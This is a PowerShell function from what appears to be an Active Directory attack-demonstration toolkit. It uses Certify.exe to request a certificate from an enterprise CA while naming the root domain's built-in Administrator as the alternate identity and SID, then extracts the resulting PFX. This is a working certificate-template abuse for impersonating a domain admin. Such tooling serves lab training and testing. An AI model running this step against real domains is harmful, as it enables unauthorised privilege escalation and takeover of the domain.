Private/Start-RequestingCertificate.ps1
|
function Start-RequestingCertificate { ################################################################################ ##### ##### ##### Requesting Certificate with Certify ##### ##### ##### ################################################################################ Param( [string] $myEntCA, [string] $CAtemplate, [string] $altname, [bool] $domainComputer ) $CurrentFunction = Get-FunctionName Write-Log -Message "### Start Function $CurrentFunction ###" $StartRunTime = (Get-Date).ToString($Script:DateFormatLog) #################### main code | out- host #################### $altname1 = $altname $sid = $null if ([string]::IsNullOrWhiteSpace($altname1) -or [string]::IsNullOrWhiteSpace($sid)) { $Forest = Get-ADForest $rootdomain = Get-ADDomain -Server $Forest.Rootdomain $sid = "$($rootdomain.DomainSID)" + "-500" if ([string]::IsNullOrWhiteSpace($altname1)) { $altname1 = (Get-ADUserNameBasedOnRID -RID "-500" -Server $rootdomain.DNSRoot) } } $Script:AlternativeUser = [PSCustomObject]@{ UPN = $altname1 SID = $sid FQDN = $rootdomain.DNSRoot Role = "Admin" } #".\Certify.exe request --ca ROOT-DC19-01.WS19-ROOT.CORP\WS19-ROOT --template CH01-BadCert --upn Administrator --sid S-1-5-21-3434748730-880471986-746661712-500" Invoke-Output -Type CodeSnippet -Message "Command:" Write-Highlight -Text " .\certify.exe ", "request ", "--ca ", $myEntCA, " --template ", $CAtemplate, " --altname ", $altname1, " --sid ", $sid ` -Color $fgcC, $fgcF, $fgcS, $fgcV, $fgcS, $fgcV, $fgcS, $fgcV, $fgcS, $fgcV Write-Host "" #Write-Log -Message " >> .\certify.exe request /ca:$myEntCA /template:$CAtemplate /altname:$altname" $hostname = $env:COMPUTERNAME If ($domainComputer -eq $true) { Write-Host "`n`n Domain Computers " -ForegroundColor Yellow -NoNewline Write-Host "can enroll your selected template - " -NoNewline Write-Host "$CAtemplate" -ForegroundColor Yellow -NoNewline Write-Host "? Do you want to add the parameter - " -NoNewline Write-host "/machine`n" -ForegroundColor Yellow Invoke-Output -Type CodeSnippet -Message "Command:" Write-Highlight -Text " .\certify.exe ", "request ", "/ca:", $myEntCA, " /template:", $CAtemplate, " /altname:", $altname, " /machine:", $hostname ` -Color $fgcS, $fgcS, $fgcS, $fgcS, $fgcS, $fgcS, $fgcS, $fgcS, $fgcF, $fgcV $question = "Press - Y or N? Default " $answer = Get-Answer -question $question -defaultValue $yes IF ($answer = "R") {} } $question = "Would you like to run this step - Y or N? Default " $answer = Get-Answer -question $question -defaultValue $yes If ($answer -eq $yes) { Invoke-Output -Type Codesnippet -Message "Requesting Certificate with Certify ..." #Check connection to Enterprise CA $result = certutil -config $myEntCA -ping #Request a Certificates If ($result[2].ToLower().Contains("successfully") -eq $True) { $Script:ASTools = Get-KeyValue -key "Tools" $result = & "$($Script:ASTools)\certify.exe" request --ca $myEntCA --template $CAtemplate --upn $altname1 --sid $sid $result | Out-Host $PfxBase64 = [regex]::Match( $result, '(?s)\[\*\] Certificate \(PFX\)\s*:\s*(?<pfx>[A-Za-z0-9+/=\r\n]+?)\s*Certify completed' ).Groups['pfx'].Value -replace '\s+', '' #$PfxBase64 | Out-Host } else { Write-Host $result[1] -ForegroundColor red Write-Host $result[3] Write-Host $result[4] return $null } } else { return $null } Invoke-output -Type Success -Message "Certificate Requesting with Certify was successful! The certificate is stored in variable `$PfxBase64." If (-not $unAttended) { pause } ######################## main code ############################ $runtime = Get-RunTime -StartRunTime $StartRunTime Write-Log -Message " Run Time: $runtime [h] ###" Write-Log -Message "### End Function $CurrentFunction ###" return $PfxBase64 } |